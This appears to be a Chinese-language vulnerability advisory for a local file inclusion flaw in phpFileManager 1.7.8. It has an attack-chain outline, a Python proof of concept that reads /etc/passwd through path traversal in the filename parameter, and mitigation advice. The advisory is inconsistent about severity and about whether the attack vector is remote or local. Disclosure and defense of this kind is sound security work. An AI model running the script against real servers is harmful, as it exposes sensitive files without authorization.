CVE-2019-25632 phpFileManager本地文件包含

漏洞信息

漏洞编号

CVE-2019-25632

漏洞类型

本地文件包含

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

phpFileManager

漏洞概述

phpFileManager 1.7.8 版本被发现存在严重的本地文件包含（LFI）安全漏洞。该漏洞的根源在于应用程序未对用户提交的输入进行严格的过滤与验证。未经身份认证的远程攻击者可以通过恶意操控 HTTP GET 请求中的 action、fm_current_dir 及 filename 参数，绕过安全限制。成功利用此漏洞将允许攻击者读取服务器上的任意敏感文件，如 /etc/passwd，从而导致严重的信息泄露风险。

技术细节

该漏洞位于 phpFileManager 的 index.php 核心处理逻辑中。由于程序在处理文件操作相关参数时缺乏有效的安全过滤机制，攻击者能够轻易利用参数注入攻击。具体而言，通过构造特定的 action 参数来触发文件包含或读取功能，并结合 fm_current_dir 和 filename 参数控制文件路径，攻击者可以使用路径遍历序列（如 ../）跳出 web 根目录。根据 CVSS 3.1 评分，该漏洞攻击向量为本地（AV:L），且无需用户交互（UI:N）和身份认证（PR:N）。一旦攻击成功，由于完整性（I:N）和可用性（A:N）未受影响，但机密性影响为高（C:H），攻击者可获取系统关键配置文件和敏感数据，为进一步的渗透攻击提供情报支持，危害程度中等。

攻击链分析

STEP 1

侦查

攻击者识别出目标服务器正在运行 phpFileManager 1.7.8 版本。

STEP 2

构造恶意请求

攻击者构造一个特制的 HTTP GET 请求，在 action 参数中指定文件操作，并在 filename 参数中使用 '../' 序列进行路径遍历。

STEP 3

发送利用请求

攻击者将包含恶意参数的请求发送至服务器的 index.php 端点。

STEP 4

文件读取与数据泄露

服务器由于未正确过滤输入，执行了文件读取操作，将 /etc/passwd 等敏感文件内容返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2019-25632 phpFileManager LFI Vulnerability

import requests

def exploit(target_url):
    """
    Exploit the Local File Inclusion vulnerability in phpFileManager 1.7.8.
    Allows reading arbitrary files on the server.
    """
    # The vulnerable endpoint
    url = f"{target_url}/index.php"
    
    # Malicious parameters to read /etc/passwd
    # 'action' triggers the file operation, 'filename' contains the path traversal
    payload = {
        "action": "view", 
        "fm_current_dir": "/",
        "filename": "../../../../../../etc/passwd"
    }

    try:
        print(f"[*] Sending request to {url}...")
        response = requests.get(url, params=payload, timeout=10)
        
        if response.status_code == 200:
            # Check if typical /etc/passwd content is returned
            if "root:" in response.text:
                print("[+] Exploit successful! Sensitive file content found:")
                print(response.text[:500]) # Print first 500 chars
            else:
                print("[-] Request sent, but no expected file content found.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://localhost/phpFileManager")
    else:
        exploit(sys.argv[1])

影响范围

phpFileManager 1.7.8

防御指南

临时缓解措施

在无法立即升级软件的情况下，建议通过 Web 服务器配置（如 Apache 的 .htaccess 或 Nginx 配置）限制对 index.php 的直接访问，或者部署 Web 应用防火墙（WAF）规则，拦截包含路径遍历特征（如 ../, ..\）的恶意请求。同时，应检查服务器日志，确认是否已被入侵，并排查是否有敏感数据已泄露。